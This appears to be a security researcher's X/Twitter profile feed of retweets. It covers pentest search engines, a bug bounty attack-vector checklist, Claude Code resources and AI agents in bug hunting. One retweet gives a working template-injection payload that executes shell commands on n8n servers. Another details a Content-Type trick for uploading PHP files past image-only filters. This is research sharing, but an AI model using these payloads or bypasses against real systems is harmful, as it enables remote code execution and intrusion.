OKCOMPUTER

594 posts

OKCOMPUTER banner
OKCOMPUTER

OKCOMPUTER

@hezd

Bug bounty participant and security researcher.

เข้าร่วม Mayıs 2007
933 กำลังติดตาม108 ผู้ติดตาม
OKCOMPUTER รีทวีตแล้ว
Vivek | Cybersecurity
Vivek | Cybersecurity@VivekIntel·
🔎 𝗦𝗲𝗮𝗿𝗰𝗵 𝗘𝗻𝗴𝗶𝗻𝗲𝘀 𝗳𝗼𝗿 𝗣𝗲𝗻𝘁𝗲𝘀𝘁𝗲𝗿𝘀 🌐 𝗜𝗻𝗳𝗿𝗮𝘀𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲 / 𝗦𝗲𝗿𝘃𝗲𝗿𝘀 • shodan.iocensys.ioonyphe.ioivre.rocks 📡 𝗧𝗵𝗿𝗲𝗮𝘁 𝗜𝗻𝘁𝗲𝗹𝗹𝗶𝗴𝗲𝗻𝗰𝗲 • app.binaryedge.io / binaryedge.ioviz.greynoise.iofofa.infozoomeye.orgleakix.netsocradar.iopulsedive.com 🕵️ 𝗢𝗦𝗜𝗡𝗧 & 𝗔𝘁𝘁𝗮𝗰𝗸 𝗦𝘂𝗿𝗳𝗮𝗰𝗲 • intelx.ioapp.netlas.iofullhunt.io 💻 𝗖𝗼𝗱𝗲 & 𝗪𝗲𝗯 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 • grep.appsearchcode.compublicwww.comurlscan.io 📧 𝗘𝗺𝗮𝗶𝗹 & 𝗜𝗱𝗲𝗻𝘁𝗶𝘁𝘆 • hunter.io 📶 𝗦𝗽𝗲𝗰𝗶𝗮𝗹𝗶𝘇𝗲𝗱 • wigle.net → WiFi networks • crt.sh → SSL certificates • vulners.com → vulnerabilities • google.com → dorks 🎯 Don’t just collect tools. Use them for recon, enumeration, and validation. #OSINT #Pentesting #CyberSecurity #BugBounty
English
2
175
806
35.9K
OKCOMPUTER รีทวีตแล้ว
امید(ی)
امید(ی)@omid_i_·
دیروز خیلیا ازم خواستن ریسورس هایی که برای Claude Code میبینم رو اینجا به اشتراک بذارم. برای شروع و اگه فقط در حد پرامپت بلدید با کلاود کار کنید، به نظرم اینا خوبه: 1. یه کورس 4 ساعته کامل youtu.be/QoQBzR1NIqI?si… 2. یه گیت هاب فول آموزشی github.com/luongnv89/clau… با اینا شروع کنید
YouTube video
YouTube
فارسی
7
41
563
50.6K
OKCOMPUTER รีทวีตแล้ว
obscaries ❘ AppSec
obscaries ❘ AppSec@obscaries·
If you're using Nuclei but not leveraging community templates, you're leaving bugs on the table 👀 The Nuclei-Templates-Collection is a curated hub of custom templates to supercharge your scans, from CVEs to real-world bug bounty cases. More templates = more coverage = more findings 🔥 🔗 github.com/emadshanab/Nuc… #BugBounty #Nuclei #Infosec #AppSec #CyberSecurity
English
0
26
128
5.3K
OKCOMPUTER รีทวีตแล้ว
NullSecurityX
NullSecurityX@NullSecurityX·
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}
English
7
83
479
36.3K
OKCOMPUTER รีทวีตแล้ว
OKCOMPUTER รีทวีตแล้ว
Wakedxy
Wakedxy@Wakedxy1·
I recently identified an interesting technique to bypass file upload restrictions by manipulating the Content-Type header. The target application enforced an image-only upload policy. Initial attempts to upload a file with a modified Content-Type such as application/html were correctly rejected. However, setting the header to application/jpeg allowed the upload to succeed, despite no validation of the actual file content. Further testing revealed inconsistent parsing behavior. When using application/text php/jpeg, the uploaded file was assigned a .txtphp extension, indicating that the server was partially deriving the extension from the MIME type in an unsafe manner. By refining this approach and setting the Content-Type to application/ php/jpeg, I was able to bypass the extension filtering mechanism entirely and upload a PHP file. In this case, the impact was limited because the file was served via CloudFront, preventing remote code execution. Nonetheless, this behavior highlights weak MIME type validation and unsafe extension handling, which could lead to critical impact in different configurations. Sharing this technique as it may be useful in similar upload validation scenarios.
Wakedxy tweet media
English
5
53
414
19.8K
OKCOMPUTER รีทวีตแล้ว
The XSS Rat - Proud XSS N00b :-)
Updated #BugBounty checklist: #ssrf-server-side-request-forgery" target="_blank" rel="nofollow noopener">github.com/The-XSS-Rat/Se…
English
2
13
50
3K
OKCOMPUTER รีทวีตแล้ว
The XSS Rat - Proud XSS N00b :-)
🚨 Web App Bug Bounty Checklist: 100 Attack Vectors Every Ethical Hacker Should Test thexssrat.podia.com/full-house-bun… For when you need inspiration mid-engagement 👇 SQL Injection (classic) Blind SQLi Time-based SQLi Error-based SQLi NoSQL Injection GraphQL Injection LDAP Injection XPath Injection OS Command Injection Template Injection (SSTI) Server-Side Prototype Pollution DOM XSS Reflected XSS Stored XSS Blind XSS Self-XSS → Privilege Escalation CSP Bypass Open Redirect → Token Theft CSRF (state-changing) Login CSRF OAuth CSRF SSRF (basic) Blind SSRF SSRF → AWS Metadata SSRF → Internal Admin Panel SSRF via PDF Generator IDOR (Object Level Auth Bypass) IDOR (Mass Enumeration) IDOR → Horizontal Priv Esc IDOR → Vertical Priv Esc Forced Browsing Parameter Tampering Hidden Parameter Discovery Mass Assignment HTTP Parameter Pollution Host Header Injection Cache Poisoning Web Cache Deception Path Traversal File Inclusion (LFI) File Inclusion (RFI) File Upload → RCE File Upload → Stored XSS MIME Type Bypass Extension Filter Bypass Business Logic Flaw (workflow skip) Race Condition TOCTOU Payment Logic Bypass Coupon Abuse Rate Limit Bypass Brute-force via Race 2FA Bypass 2FA Reuse Password Reset Poisoning Token Predictability JWT None Algorithm JWT Signature Confusion JWT Key Disclosure Session Fixation Session Hijacking Session Timeout Bypass Clickjacking CORS Misconfiguration Subdomain Takeover Dangling DNS S3 Bucket Misconfig Public .git Exposure Public .env Exposure Debug Endpoints Swagger / GraphQL Introspection Abuse Backup File Exposure Sensitive Log Exposure Prototype Pollution → XSS Deserialization → RCE Insecure Direct File Access Email Header Injection CRLF Injection Request Smuggling HTTP Response Splitting WebSocket Auth Bypass WebSocket Message Tampering API Version Downgrade Mobile API Hardcoded Keys Client-Side Validation Bypass Business Email Change Abuse Stored HTML Injection PDF Injection XML External Entity (XXE) SVG XSS CSP Report Leak Abuse Password Policy Bypass Account Enumeration GraphQL Batching Abuse OAuth Misbinding Third-Party Script Takeover DOM Clobbering Referrer Leakage Metadata Leakage (Open Graph) Chained Exploits (Low → Critical) Bookmark this. Save it. Run it on every target. Happy hacking — responsibly. 🛡️ #BugBounty #AppSec #EthicalHacking #WebSecurity
English
1
23
126
6.2K
OKCOMPUTER รีทวีตแล้ว
bugcrowd
bugcrowd@Bugcrowd·
AI agents are the shiny new toy in security, but can they actually land you a P1? 🕵️‍♂ @hbenja_m went down the rabbit hole, moving from classic Bash scripts to a multi-agent CrewAI setup for OSINT and bug hunting. The result was a wild ride through automated report generation, a mountain of false positives, and a crucial lesson: ⤵ AI is an amplifier of skill, not a substitute for it 👌 Read this before your LLM hallucinates another P5: bugcrowd.com/blog/what-i-le…
English
1
13
61
4.1K